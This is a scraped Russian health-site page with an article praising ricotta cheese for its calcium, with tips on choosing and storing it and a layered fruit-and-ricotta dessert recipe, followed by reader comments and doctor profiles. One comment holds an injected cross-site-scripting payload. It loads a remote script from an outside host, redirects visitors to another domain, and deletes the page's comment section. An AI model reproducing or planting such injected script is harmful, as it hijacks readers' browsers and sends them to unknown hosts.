Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сыр рикотта: чемпион по к...  >>  Сыр рикотта: чемпион по кальцию
 
Обратная связь
 

Сыр рикотта: чемпион по кальцию

Размер шрифта
07 февраля 2012 06:16
  • google_analytics: false
  • Нравится

Итальянский сыр рикотта хорош всем: кальция много, калорий мало. Как выбрать этот сыр, как хранить и какой потрясающий десерт из него можно приготовить.

1

Рикотта – близкий родственник творога, по вкусу напоминает жирные сливки. Рикотта переводится как «повторно сваренный», «повторно приготовленный». После производства сыров фета и моцарелла остается сычужная масса. Ее некоторое время выдерживают, затем добавляют лимонную кислоту, дают день-два настояться, и доводят на огне до 80-90 градусов. Получается мягкий нежирный сыр вторичной выработки (в одном из сортов рикотты, ricotta fresco всего 8% жирности).

По вкусу рикотта не похож на остальные сыры. Основной молочный белок в его составе уже отсутствует. Остается только белок альбумин, он содержится в крови человека, а значит, легче усваивается.

Достоинства рикотты

  • По сравнению с другими этот сыр – маложирный. У выдержанной ricotta forte всего 150 ккал.
  • В рикотте много витамина А, который отвечает за рост и обновление кожи и работу наших глаз: особые клетки, палочки и колбочки действуют на основе химических веществ, которые производятся из витамина А.
  • Все полезные вещества в сыре в процессе приготовления не пропадают: ведь до кипения эти сыры не доводятся.
  • В рикотте очень много кальция. Кальций – главный структурный компонент нашей костной ткани. Без кальция кости разрушаются. Если ребенку не хватает кальция, кости не будут нормально формироваться. При нехватке кальция начинается разрушение костной ткани.

Пьедестал почета по содержанию кальция

1. Рикотта 270 мг на 100 г
2. Творог 200 мг на 100 г
3. Молоко 125 мг на 100 г

Как выбрать

  1. Смотреть срок годности на упаковке.

  2. Определить, из какого молока сделана рикотта (самый жирный продукт получается из козьего молока, до 24% жирности).

  3. Развесная рикотта должна быть белоснежной. Если есть возможность – попробуйте: она должна быть очень нежной и мягкой на вкус, влажной и сладковатой за счет содержания молочного сахара, лактозы.

  4. Кислый продукт говорит о том, что продукт испорчен.

Как хранить

  1. Продукт нельзя долго хранить. Рикотту лучше употребить в течение трех дней после покупки, даже если она хранится в холодильнике и в вакуумном контейнере.

  2. Более твердые сорта, выдержанные, хранятся в холодильнике до двух недель, к примеру ricotta romana.

Как приготовить

  1. Есть в том виде, в котором он есть.

  2. Сделать мильфей – слоеный десерт. Вам понадобится: клубника, банан, рикотта, грушевое пюре, карамель.

Выкладывайте слоями: клубника, рикотта с грушевым пюре, банан, снова рикотта. Сформировать десерт с помощью специальной формы.

Большой плюс этого десерта в том, что не нужен сахар – фрукты и без того дают свой аромат. Можно полить карамелью и поджечь.


Сюжеты по теме:
Вот это по-итальянски. Блюда с сыром Рикотта

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

07 февраля 2012 в 13:05

Цитировать   |   Пожаловаться

а про адыгейский сыр, который большинство простого народа покупает, вам уже не пишется...все только про импортные продукты....

2 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.